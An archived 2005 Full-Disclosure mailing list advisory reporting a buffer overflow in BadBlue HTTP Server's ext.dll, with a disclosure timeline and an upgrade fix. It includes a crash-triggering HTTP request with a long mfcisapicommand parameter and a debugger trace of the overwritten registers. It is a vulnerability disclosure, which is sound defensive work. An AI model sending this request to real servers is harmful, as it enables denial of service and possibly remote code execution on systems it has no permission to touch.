[Full-Disclosure] Badblue HTTP Server, ext.dll buffer overflow

From: Andres Tarasco (atarasco_at_sia.es)
Date: 02/26/05

  • Next message: Steve Kudlak: "Re: Fw: [Full-Disclosure] Google Search and Gmail Correlation(ev gpsc verify reciept please)"
    To: "'full-disclosure@lists.netsys.com'" <full-disclosure@lists.netsys.com>
    Date: Sat, 26 Feb 2005 18:30:16 +0100
    
    
    

    SIA International Security Advisory - Badblue HTTP Server, ext.dll buffer
    overflow

    * Release DAte:
    February 26, 2005

    * Vendor:
    Working Resources Inc. http://www.badblue.com

    * Versions Affected:
    Confirmed under Badblue HTTP Server v2.55

    * Severity:
    Critical (Remote Code execution)

    * Summary:
    "BadBlue is not only a server, it's a complete file sharing system that is
    simply easier and faster to use than anything else. Why? Because BadBlue
    lets you use a tool you already know well: a web browser."
    "In seconds, you can turn your PC into a powerful web server. You can easily
    share photos, music, videos, and much more. With its simple menu-driven
    interface and pop-up wizards to guide you through setup, there's no faster
    way to share files"

    * Technical Details:
    SIA has discovered a buffer overflow in EXT.DLL, a module that handles
    badblue http Requests. This buffer overflow triggers when an special crafted
    HTTP Request is created.
    Buffer overflow in EXT.DLL is triggered when a malicious http request that
    contains a long mfcisapicommand parameter, with more than 250 chars, is
    submitted. Some registers are overwritten so its possible to execute code or
    cause a denial of service shutting down the server. The Following request
    can be used to crash the remote server.

    GET /ext.dll?mfcisapicommand=AAA...[250 chars]...AAA&page=index.htx

    Windbg trace:
    (360.21c): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=026bda14 ebx=01130478 ecx=41414141 edx=0113057d esi=41414141
    edi=77e2b495
    eip=10042004 esp=026bd8f4 ebp=026bdbe0 iopl=0 nv up ei pl nz na po
    nc
    cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
    efl=00010206
    *** WARNING: Unable to verify checksum for E:\BadBlue\PE\ext.dll
    *** ERROR: Symbol file could not be found. Defaulted to export symbols for
    E:\BadBlue\PE\ext.dll -
    ext!GetExtensionVersion+0x13f7:
    10042004 8b3e mov edi,[esi]
    ds:0023:41414141=????????

    Succesfully exploitation of this flaw could allow remote code execution with
    Administrator rigths.

    * Solution:
    Upgrade to the lastest available version. At this time, vendor provides
    version v2.6 that is available to download at
    http://www.badblue.com/bb98.exe

    * Credits:
    Andres Tarasco (atarasco _at_ sia.es) has discovered this vulnerability

    * Disclosure Timeline:
    December 2004 - Discovered
    December 20, 2004 - Initial Vendor Notification
    December 21, 2004 - Initial Vender Response
    January 3, 2005 - Vendor Patch released (v2.60)
    February 26, 2005 - Public Disclosure

    
    

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html


  • Next message: Steve Kudlak: "Re: Fw: [Full-Disclosure] Google Search and Gmail Correlation(ev gpsc verify reciept please)"

    Relevant Pages

    • [NEWS] Multiple IBM DB2 Vulnerabilities
      ... crash the server and run arbitrary machine code. ... IBM DB2 db2fmp buffer overflow: ... overly parameter to the db2fmp binary will overflow a stack based buffer. ...
      (Securiteam)
    • def-2001-31
      ... WS_FTP server 2.0.3 contains a buffer overflow which affects the ... The parsing code for the STAT command suffers from a buffer ...
      (Bugtraq)
    • [NEWS] How to Remotely and Automatically Exploit a Format Bug
      ... Exploiting a format bug remotely is not as difficult as one would think. ... We will use very minimalist server along this paper. ... Since the buffer is directly available to a malicious user, ... Guessing the address of the shellcode in the stack ...
      (Securiteam)
    • Re: smbclient timeout, file truncated / 9.1 Pro (was Re: libpopt.so.0 conflict...
      ... >and the OS/2 machines on the LAN. ... NETBEUI was invented to allow windows clients to use an OS/2 server. ... 9 buffer small read and write requests until the buffer is full ... Acknowledgment Timeout ...
      (alt.os.linux.suse)
    • [UNIX] Multiple Vulnerabilities in Citadel/UX
      ... could allow complete control over a vulnerable server. ... Citadel server as can be seen by this simplistic code snippet: ... configuration buffers, leading to the possibility of carrying out a buffer ... int connect_to_host; ...
      (Securiteam)